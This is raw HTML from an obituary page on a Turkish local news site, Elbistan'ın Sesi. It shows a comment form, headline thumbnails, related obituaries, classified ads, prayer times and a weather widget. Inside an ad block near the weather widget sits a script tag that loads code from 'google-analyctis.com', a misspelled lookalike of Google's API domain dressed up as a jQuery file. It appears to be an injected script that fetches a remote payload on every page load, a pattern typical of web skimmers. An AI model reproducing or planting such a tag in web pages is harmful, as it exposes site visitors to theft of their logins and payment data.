pull-right">Yorum Gönder</a> <div class="karakter span4 pull-right">Kalan Karakter: <input name="character" id="character" disabled size="3" value="1000"></div></div> </div> <input type="hidden" name="hid" value="68090" /> <input type="hidden" name="uid" value="0" /> <input type="hidden" name="tip" value="haber" /> <input type="hidden" name="cevap" value="" class="answer" /> <input type="hidden" name="cevap_id" value="0" class="cevap_id" /> <input type="hidden" name="token" value="a35fe593baa02917a87d73b1454ccb562e902238" /> </form> </div> <div class="alert">Yorumunuz onaylanmak üzere yöneticiye iletilmiştir.<a class="close" data-dismiss="alert" href="#">&times;</a></div> </div> <div class="alert alert-block alert-error fade in" style="display:block;margin-top:15px;"> <button type="button" class="close" data-dismiss="alert">×</button> <strong>Dikkat!</strong> Suç teşkil edecek, yasadışı, tehditkar, rahatsız edici, hakaret ve küfür içeren, aşağılayıcı, küçük düşürücü, kaba, pornografik, ahlaka aykırı, kişilik haklarına zarar verici ya da benzeri niteliklerde içeriklerden doğan her türlü mali, hukuki, cezai, idari sorumluluk içeriği gönderen Üye/Üyeler’e aittir. </div> </div> <!-- .tab-pane --> <div class="tab-pane yorumlar fbpanel" id="facebookpanel"> <div class="row-fluid"> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <div class="fb-comments" data-href="http://www.elbistaninsesi.com/vefatlar/mevlut-sag-46-yasinda-h68090.html" data-width="603" data-colorscheme="light" data-numposts="10"></div> </div> <!-- #facebookpanel --> </div> </div> <!-- .tab-content --> </div> <!-- #yorumlar --> </section> </div> <!-- Sağ Blok --> <div id="sidebar" class="aside span4"> <div class="gazeteler"> <div id="carousel-gazeteler" class="carousel gazeteler slide"> <div class="box header black"> <h5 class="glyphicons bookmark" style="text-align:left;">GAZETE MANŞETLERİ</h5> <!-- <div class="pull-right"> <ol class="carousel-indicators"> <li data-target="#carousel-gazeteler" data-slide-to="0" class="active"></li> <li data-target="#carousel-gazeteler" data-slide-to="1"></li> <li data-target="#carousel-gazeteler" data-slide-to="2"></li> <li data-target="#carousel-gazeteler" data-slide-to="3"></li> <li data-target="#carousel-gazeteler" data-slide-to="4"></li> <li data-target="#carousel-gazeteler" data-slide-to="5"></li> <li data-target="#carousel-gazeteler" data-slide-to="6"></li> </ol> </div> --> </div> <div class="box content"> <div class="carousel-inner"> <div class="item active"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/aksam" title="Akşam" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-10-16//thumbs-150/aksam.jpg" alt="Akşam"/></div> <p>Akşam</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/dirilis-postasi" title="Diriliş Postası" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-10-16//thumbs-150/dirilis-postasi.jpg" alt="Diriliş Postası"/></div> <p>Diriliş Postası</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/dunya" title="Dünya" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-10-16//thumbs-150/dunya.jpg" alt="Dünya"/></div> <p>Dünya</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/dogru-haber" title="Doğru Haber" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-10-16//thumbs-150/dogru-haber.jpg" alt="Doğru Haber"/></div> <p>Doğru Haber</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/gunes" title="Güneş" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-10-16//thumbs-150/gunes.jpg" alt="Güneş"/></div> <p>Güneş</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/harbi-gazete" title="Harbi Gazete" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-10-16//thumbs-150/harbi-gazete.jpg" alt="Harbi Gazete"/></div> <p>Harbi Gazete</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/karar" title="Karar" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-10-16//thumbs-150/karar.jpg" alt="Karar"/></div> <p>Karar</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/korkusuz" title="Korkusuz" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-10-16//thumbs-150/korkusuz.jpg" alt="Korkusuz"/></div> <p>Korkusuz</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/ortadogu" title="Ortadoğu" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-10-16//thumbs-150/ortadogu.jpg" alt="Ortadoğu"/></div> <p>Ortadoğu</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/milli-gazete" title="Milli Gazete" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-10-16//thumbs-150/milli-gazete.jpg" alt="Milli Gazete"/></div> <p>Milli Gazete</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/sozcu" title="Sözcü" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-10-16//thumbs-150/sozcu.jpg" alt="Sözcü"/></div> <p>Sözcü</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/star" title="Star" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-10-16//thumbs-150/star.jpg" alt="Star"/></div> <p>Star</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/turkiye" title="Türkiye" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-10-16//thumbs-150/turkiye.jpg" alt="Türkiye"/></div> <p>Türkiye</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/turkgun" title="Türkgün" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-10-16//thumbs-150/turkgun.jpg" alt="Türkgün"/></div> <p>Türkgün</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-akit" title="Yeni Akit" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-10-16//thumbs-150/yeni-akit.jpg" alt="Yeni Akit"/></div> <p>Yeni Akit</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-asya" title="Yeni Asya" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-10-16//thumbs-150/yeni-asya.jpg" alt="Yeni Asya"/></div> <p>Yeni Asya</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-birlik" title="Yeni Birlik" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-10-16//thumbs-150/yeni-birlik.jpg" alt="Yeni Birlik"/></div> <p>Yeni Birlik</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/yenicag" title="Yeniçağ" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-10-16//thumbs-150/yenicag.jpg" alt="Yeniçağ"/></div> <p>Yeniçağ</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yenisoz" title="Yenisöz" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-10-16//thumbs-150/yenisoz.jpg" alt="Yenisöz"/></div> <p>Yenisöz</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-safak" title="Yeni Şafak" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-10-16//thumbs-150/yeni-safak.jpg" alt="Yeni Şafak"/></div> <p>Yeni Şafak</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/milat" title="Milat" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-10-16//thumbs-150/milat.jpg" alt="Milat"/></div> <p>Milat</p> </a> </div> </div> </div> </div> <a class="fl_ carousel-control left" href="#carousel-gazeteler" data-slide="prev">&lsaquo;</a> <a class="fl_ carousel-control right" href="#carousel-gazeteler" data-slide="next">&rsaquo;</a> </div> </div> <!-- ILGILI HABERLER --> <div id="ilgiliHaberler-y"> <div class="ilgiliHaberler-y-t glyphicons show_big_thumbnails">İlgili Haberler</div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/soner-kaba-25-yasinda-h68091.html" title="Soner Kaba 25 yaşında,"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/10/soner_kaba_25_yasinda_h68091_4544c.jpg" alt="Soner Kaba 25 yaşında," /> <span>Soner Kaba 25 yaşında,</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/hasan-karatas-82-yasinda-h68083.html" title="Hasan Karataş 82 yaşında,"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/10/hasan_karatas_82_yasinda_h68083_f8899.jpg" alt="Hasan Karataş 82 yaşında," /> <span>Hasan Karataş 82 yaşında,</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/elif-kuyucu-75-yasinda-h68082.html" title="Elif Kuyucu 75 yaşında,"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/10/elif_kuyucu_75_yasinda_h68082_b8fff.jpg" alt="Elif Kuyucu 75 yaşında," /> <span>Elif Kuyucu 75 yaşında,</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/anma-mehmet-ceren-h68071.html" title="Anma / Mehmet Ceren"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/10/anma_mehmet_ceren_h68071_11498.jpg" alt="Anma / Mehmet Ceren" /> <span>Anma / Mehmet Ceren</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/gulsum-bolat-74-yasinda-h68070.html" title="Gülsüm Bolat 74 yaşında,"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/10/gulsum_bolat_74_yasinda_h68070_744f4.jpg" alt="Gülsüm Bolat 74 yaşında," /> <span>Gülsüm Bolat 74 yaşında,</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/anma-durdu-mehmet-cakir-h68069.html" title="Anma / Durdu Mehmet ÇAKIR"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/10/anma_durdu_mehmet_cakir_h68069_33789.jpg" alt="Anma / Durdu Mehmet ÇAKIR" /> <span>Anma / Durdu Mehmet ÇAKIR</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/fatma-bestepe-71-yasinda-h68068.html" title="Fatma Beştepe 71 yaşında"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/10/fatma_bestepe_71_yasinda_h68068_30e55.jpg" alt="Fatma Beştepe 71 yaşında" /> <span>Fatma Beştepe 71 yaşında</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/semiha-bektas-81-yasinda-h68066.html" title="Semiha Bektaş 81 yaşında"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/10/semiha_bektas_81_yasinda_h68066_9bad5.jpg" alt="Semiha Bektaş 81 yaşında" /> <span>Semiha Bektaş 81 yaşında</span> </a> </div> </div> <div id="syazar"> <div class="header"> <h5><a style="margin-top:10px;" href="http://www.elbistaninsesi.com/seri-ilanlar/ilanver.html" class="this pull-left btn btn-small" title="İlan Ekle"><i class="halflings-icon plus"></i> İlan Ekle</a> <a style="margin-right:65px;font-size:140%;color:red;" href="http://www.elbistaninsesi.com/seri-ilanlar" title="Seri İlanlar">Seri İlanlar</a></h5> <a class="control left" href="#" id="syprev"></a> <a class="control right" href="#" id="synext"></a> </div> <div class="content"> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-31-daire-13231.html" title="Kiralık 3+1 daire" >Kiralık 3+1 daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-31-daire-13231.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Kiralık 3+1 daire" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-tarla-13227.html" title="Satılık tarla" >Satılık tarla</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-tarla-13227.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/94f4dd53019651067bd7e570656732ffc0c6a3a1.jpg" alt="Satılık tarla" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/temizlik-gorevlisi-13224.html" title="Temizlik görevlisi" >Temizlik görevlisi</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/temizlik-gorevlisi-13224.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Temizlik görevlisi" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/ambarcikta-satilik-tarla-13223.html" title="AMBARCIKTA SATILIK TARLA" >AMBARCIKTA SATILIK TARLA</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/ambarcikta-satilik-tarla-13223.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="AMBARCIKTA SATILIK TARLA" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-ev-13205.html" title="KİRALIK EV" >KİRALIK EV</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-ev-13205.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="KİRALIK EV" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-ev-13204.html" title="SATILIK EV" >SATILIK EV</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-ev-13204.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="SATILIK EV" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kizilcioba-mahallesinde-satlik-daire-13201.html" title="Kizilcioba mahallesinde satlik daire" >Kizilcioba mahallesinde satlik daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kizilcioba-mahallesinde-satlik-daire-13201.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Kizilcioba mahallesinde satlik daire" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-13200.html" title="KİRALIK DAİRE" >KİRALIK DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-13200.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="KİRALIK DAİRE" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/ozel-ders-verilir-13199.html" title="ÖZEL DERS VERİLİR" >ÖZEL DERS VERİLİR</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/ozel-ders-verilir-13199.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="ÖZEL DERS VERİLİR" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/ilkokul-ogrencilerine-ozel-ders-13197.html" title="İLKOKUL ÖĞRENCİLERİNE ÖZEL DERS" >İLKOKUL ÖĞRENCİLERİNE ÖZEL DERS</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/ilkokul-ogrencilerine-ozel-ders-13197.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="İLKOKUL ÖĞRENCİLERİNE ÖZEL DERS" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/rehberlik-ve-psikolojik-danisman-ve-ozel-egitim-13196.html" title="Rehberlik ve Psikolojik Danışman ve Özel Eğitim" >Rehberlik ve Psikolojik Danışman ve Özel Eğitim</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/rehberlik-ve-psikolojik-danisman-ve-ozel-egitim-13196.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Rehberlik ve Psikolojik Danışman ve Özel Eğitim" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/esentepe-sobali-ev-13192.html" title="Esentepe sobalı ev" >Esentepe sobalı ev</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/esentepe-sobali-ev-13192.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/1cc0fed0d9e60afaf65696f7cf76fced64a3a1d4.jpg" alt="Esentepe sobalı ev" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/ucretli-ogretmen-araniyor-13191.html" title="ÜCRETLİ ÖĞRETMEN ARANIYOR" >ÜCRETLİ ÖĞRETMEN ARANIYOR</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/ucretli-ogretmen-araniyor-13191.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="ÜCRETLİ ÖĞRETMEN ARANIYOR" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/bayan-eleman-13185.html" title="BAYAN ELEMAN" >BAYAN ELEMAN</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/bayan-eleman-13185.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/c503b78b611b8af9044d372a3fccf6d1b9a14c24.jpg" alt="BAYAN ELEMAN" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-kaloriferli-daire-13184.html" title="Kiralık kaloriferli daire" >Kiralık kaloriferli daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-kaloriferli-daire-13184.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/00b744381b08d42cda333b42b274b5d88f2f3041.jpg" alt="Kiralık kaloriferli daire" class="img-rounded" /></a> </div> </div> </div> </div> </div> <!-- SOSYAL --> <div class="sosyal"> <div class="row-fluid content"> <div class="span6 box facebook"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div> <div class="right"> <span class="count"><a href="https://facebook.com/elbistaninsesi" target="blank" id="likes">39.7B</a></span> <span class="text">Beğeni</span> </div> </div> <div class="bottom"> <a href="https://facebook.com/elbistaninsesi" target="blank" rel="nofollow">Facebook'ta Beğen</a> </div> </div> <div class="span6 box twitter"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div> <div class="right"> <span class="count"><a href="https://twitter.com/elbistaninsesi" target="blank" id="followers">98</a></span> <span class="text">Takipçi</span> </div> </div> <div class="bottom"> <a href="https://twitter.com/elbistaninsesi" target="blank" rel="nofollow">Twitter'da Takip Et</a> </div> </div> </div> </div> <div id = "nobetci"> <a href="http://www.elbistaninsesi.com/images/dosyalarim/eczane.jpg" title="Nöbetçi Eczane" target="_blank"><img src = "http://www.ugurmumcu.info.tr/wp-content/uploads/2014/05/rb-eczane.png"></a> </div> <!-- NAMAZ VAKITLERI --> <div class="namazvakitleri"> <div class="title"> <h5>Namaz Vakitleri</h5> <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right"> <option value="adana" >Adana</option> <option value="adiyaman" >Adıyaman</option> <option value="afyon" >Afyon</option> <option value="agri" >Ağrı</option> <option value="aksaray" >Aksaray</option> <option value="amasya" >Amasya</option> <option value="ankara" >Ankara</option> <option value="antalya" >Antalya</option> <option value="ardahan" >Ardahan</option> <option value="artvin" >Artvin</option> <option value="aydin" >Aydın</option> <option value="balikesir" >Balıkesir</option> <option value="bartin" >Bartın</option> <option value="batman" >Batman</option> <option value="bayburt" >Bayburt</option> <option value="bilecik" >Bilecik</option> <option value="bingol" >Bingöl</option> <option value="bitlis" >Bitlis</option> <option value="bolu" >Bolu</option> <option value="burdur" >Burdur</option> <option value="bursa" >Bursa</option> <option value="canakkale" >Çanakkale</option> <option value="cankiri" >Çankırı</option> <option value="corum" >Çorum</option> <option value="denizli" >Denizli</option> <option value="diyarbakir" >Diyarbakır</option> <option value="duzce" >Düzce</option> <option value="edirne" >Edirne</option> <option value="elazig" >Elazığ</option> <option value="erzincan" >Erzincan</option> <option value="erzurum" >Erzurum</option> <option value="eskisehir" >Eskişehir</option> <option value="gaziantep" >Gaziantep</option> <option value="giresun" >Giresun</option> <option value="gumushane" >Gümüşhane</option> <option value="hakkari" >Hakkari</option> <option value="hatay" >Hatay</option> <option value="igdir" >Iğdır</option> <option value="isparta" >Isparta</option> <option value="istanbul" >İstanbul</option> <option value="izmir" >İzmir</option> <option value="kahramanmaras" selected>Kahramanmaraş</option> <option value="karabuk" >Karabük</option> <option value="karaman" >Karaman</option> <option value="kars" >Kars</option> <option value="kastamonu" >Kastamonu</option> <option value="kayseri" >Kayseri</option> <option value="kirikkale" >Kırıkkale</option> <option value="kirklareli" >Kırklareli</option> <option value="kirsehir" >Kırşehir</option> <option value="kilis" >Kilis</option> <option value="izmit" >Kocaeli</option> <option value="konya" >Konya</option> <option value="kutahya" >Kütahya</option> <option value="malatya" >Malatya</option> <option value="manisa" >Manisa</option> <option value="mardin" >Mardin</option> <option value="mersin" >Mersin</option> <option value="mugla" >Muğla</option> <option value="mus" >Muş</option> <option value="nevsehir" >Nevşehir</option> <option value="nigde" >Niğde</option> <option value="ordu" >Ordu</option> <option value="osmaniye" >Osmaniye</option> <option value="rize" >Rize</option> <option value="adapazari" >Sakarya</option> <option value="samsun" >Samsun</option> <option value="siirt" >Siirt</option> <option value="sinop" >Sinop</option> <option value="sivas" >Sivas</option> <option value="sanliurfa" >Şanlıurfa</option> <option value="sirnak" >Şırnak</option> <option value="tekirdag" >Tekirdağ</option> <option value="tokat" >Tokat</option> <option value="trabzon" >Trabzon</option> <option value="tunceli" >Tunceli</option> <option value="usak" >Uşak</option> <option value="van" >Van</option> <option value="yalova" >Yalova</option> <option value="yozgat" >Yozgat</option> <option value="zonguldak" >Zonguldak</option> </select> </div> <div class="content"> <div class="sonuc"> <table cellspacing="0" cellpadding="0" id="vakitler"> <tr> <th>İmsak</th> <th>Güneş</th> <th>Öğle</th> <th>İkindi</th> <th>Akşam</th> <th>Yatsı</th> </tr> <tr> <td>05:15</td> <td>06:35</td> <td>12:23</td> <td>15:29</td> <td>18:00</td> <td>19:15</td> </tr> </table> </div> </div> </div> <div class="reklam reklam208"><iframe name=BIKADV src="http://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe> <script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div><a href="http://www.accuweather.com/tr/tr/elbistan/318373/current-weather/318373" class="aw-widget-legal"> <!-- By accessing and/or using this code snippet, you agree to AccuWeather’s terms and conditions (in English) which can be found at http://www.accuweather.com/en/free-weather-widgets/terms and AccuWeather’s Privacy Statement (in English) which can be found at http://www.accuweather.com/en/privacy. --> </a><div id="awtd1452737033699" class="aw-widget-36hour" data-locationkey="318373" data-unit="c" data-language="tr" data-useip="false" data-uid="awtd1452737033699" data-editlocation="false"></div><script type="text/javascript" src="http://oap.accuweather.com/launch.js"></script> <!-- ENCOKLAR --> <div class="encoklar"> <div class="accordion"> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne"> <span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5></a> </div> <div id="collapseOne" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/vefatlar/ayfer-agir-30-yasinda-h67796.html" title="Ayfer Ağır 30 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/09/ayfer_agir_30_yasinda_h67796_370d9.jpg" alt="Ayfer Ağır 30 yaşında" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/ayfer-agir-30-yasinda-h67796.html" title="" ><span class="en-hit">1.</span> <strong>Ayfer Ağır 30 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/pancar-sokme-makinesinin-altinda-kalan-kisi-hayatini-kaybetti-h67886.html" title="Pancar sökme makinesinin altında..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/09/pancar_sokme_makinesinin_altinda_kalan_kisi_hayatini_kaybetti_h67886_188b6.jpg" alt="Pancar sökme makinesinin altında..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/pancar-sokme-makinesinin-altinda-kalan-kisi-hayatini-kaybetti-h67886.html" title="" ><span class="en-hit">2.</span> <strong>Pancar sökme makinesinin altında...</strong> <span class="en-spot en-hidden">Elbistan&#039;da pancar sökme makinesinin altında kalan 33 yaşındaki...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/ael-de-freni-patlayan-kamyon-bant-yoluna-carpti-1-olu-3-yarali-h67901.html" title="AEL#039;de freni patlayan kamyon bant..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/09/ael_de_freni_patlayan_kamyon_bant_yoluna_carpti_1_olu_3_yarali_h67901_1d571.jpg" alt="AEL#039;de freni patlayan kamyon bant..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/ael-de-freni-patlayan-kamyon-bant-yoluna-carpti-1-olu-3-yarali-h67901.html" title="" ><span class="en-hit">3.</span> <strong>AEL&#039;de freni patlayan kamyon bant...</strong> <span class="en-spot en-hidden">Afşin Elbistan Linyitleri Kömür İşletmesinde işçileri taşıyan...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/9-gundur-kayipti-ormanlik-alanda-cansiz-bedeni-bulundu-h68081.html" title="9 gündür kayıptı, ormanlık alanda..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/10/9_gundur_kayipti_ormanlik_alanda_cansiz_bedeni_bulundu_h68081_80103.jpg" alt="9 gündür kayıptı, ormanlık alanda..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/9-gundur-kayipti-ormanlik-alanda-cansiz-bedeni-bulundu-h68081.html" title="" ><span class="en-hit">4.</span> <strong>9 gündür kayıptı, ormanlık alanda...</strong> <span class="en-spot en-hidden">Elbistan’da 9 gün önce kaybolduktan sonra kendisinden bir daha haber...</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/guncel/silahli-kavgada-mahalle-muhtari-hayatini-kaybetti-h67879.html" title="Silahlı kavgada mahalle muhtarı hayatını..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/09/silahli_kavgada_mahalle_muhtari_hayatini_kaybetti_h67879_34631.jpg" alt="Silahlı kavgada mahalle muhtarı hayatını..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/silahli-kavgada-mahalle-muhtari-hayatini-kaybetti-h67879.html" title="" ><span class="en-hit">5.</span> <strong>Silahlı kavgada mahalle muhtarı hayatını...</strong> <span class="en-spot en-hidden">Göksun ilçesine bağlı Ericek Mahallesi’nde 2 grup arasında çıkan...</span></a></div></li> </ul> </div> </div> </div> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo"> <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a> 